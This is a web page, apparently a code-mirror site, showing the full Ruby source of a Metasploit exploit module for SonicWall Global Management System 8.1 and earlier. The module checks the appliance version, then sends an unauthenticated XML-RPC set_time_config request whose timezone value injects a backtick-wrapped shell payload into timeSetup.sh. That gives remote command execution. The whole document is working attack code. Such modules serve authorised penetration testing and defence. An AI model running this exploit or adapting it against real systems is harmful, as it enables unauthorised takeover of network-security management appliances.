Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89include Msf::Exploit::Remote::HttpClient1011def initialize(info={})12super(update_info(info,13'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",14'Description' => %q{15This module exploits a vulnerability in SonicWall Global16Management System Virtual Appliance versions 8.1 (Build 8110.1197)17and below. This virtual appliance can be downloaded from18http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a19holistic way to manage your entire network security environment.'2021These vulnerable versions (8.1 Build 8110.1197 and below) do not22prevent unauthenticated, external entities from making XML-RPC23requests to port 21009 of the virtual app. After the XML-RPC call24is made, a shell script is called like so:25'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.26},27'License' => MSF_LICENSE,28'Author' => [ 'Michael Flanders', #MSF Module29'kernelsmith' #Advisor30],31'References' => [32['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],33['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']34],35'Platform' => [ 'unix' ],36'Arch' => ARCH_CMD,37'Targets' => [38[ 'SonicWall Global Management System Virtual Appliance', {} ],39],40'Payload' => {41# Can't use ampersand, Java's XML-RPC parser will complain and return an error42'BadChars' => "\x26",43'Compat' => {44'PayloadType' => 'cmd',45'RequiredCmd' => 'generic bash telnet'46}47},48'DisclosureDate' => '2016-07-22',49'DefaultTarget' => 0))5051register_options(52[53OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.54Defaults to 80/443 depending on SSL.'])55])56end5758def check59if datastore['WEB_SERVER_PORT']60port_number = datastore['WEB_SERVER_PORT']61else62port_number = datastore['SSL'] ? '443' : '80'63end6465handler = datastore['SSL'] ? 'https' : 'http'6667res = request_url("#{handler}://#{rhost}:#{port_number}")6869unless res70vprint_error 'Connection failed'71return CheckCode::Unknown72end7374unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/75return CheckCode::Safe76end7778version = Rex::Version.new $1.to_s7980unless version <= Rex::Version.new('8.1')81return CheckCode::Safe82end8384CheckCode::Appears85end8687def exploit88unless check == CheckCode::Appears89fail_with Failure::NotVulnerable, "The target is not vulnerable."90end9192print_status "The target appears to be vulnerable, continuing exploit..."93send_xml94end9596def send_xml97xml_body = <<~HERESTRING98<?xml version="1.0" encoding="UTF-8"?>99<methodCall>100<methodName>set_time_config</methodName>101<params>102<param>103<value>104<struct>105<member>106<name>timezone</name>107<value>108<string>"`#{payload.encoded}`"</string>109</value>110</member>111</struct>112</value>113</param>114</params>115</methodCall>116HERESTRING117118res = send_request_raw({119'method' => 'POST',120'uri' => '/',121'data' => xml_body,122'ctype' => 'text/xml; charset=UTF-8'123})124125unless res && res.body.include?("success")126print_error("Error sending XML to #{rhost}:#{rport}")127end128end129130end131132133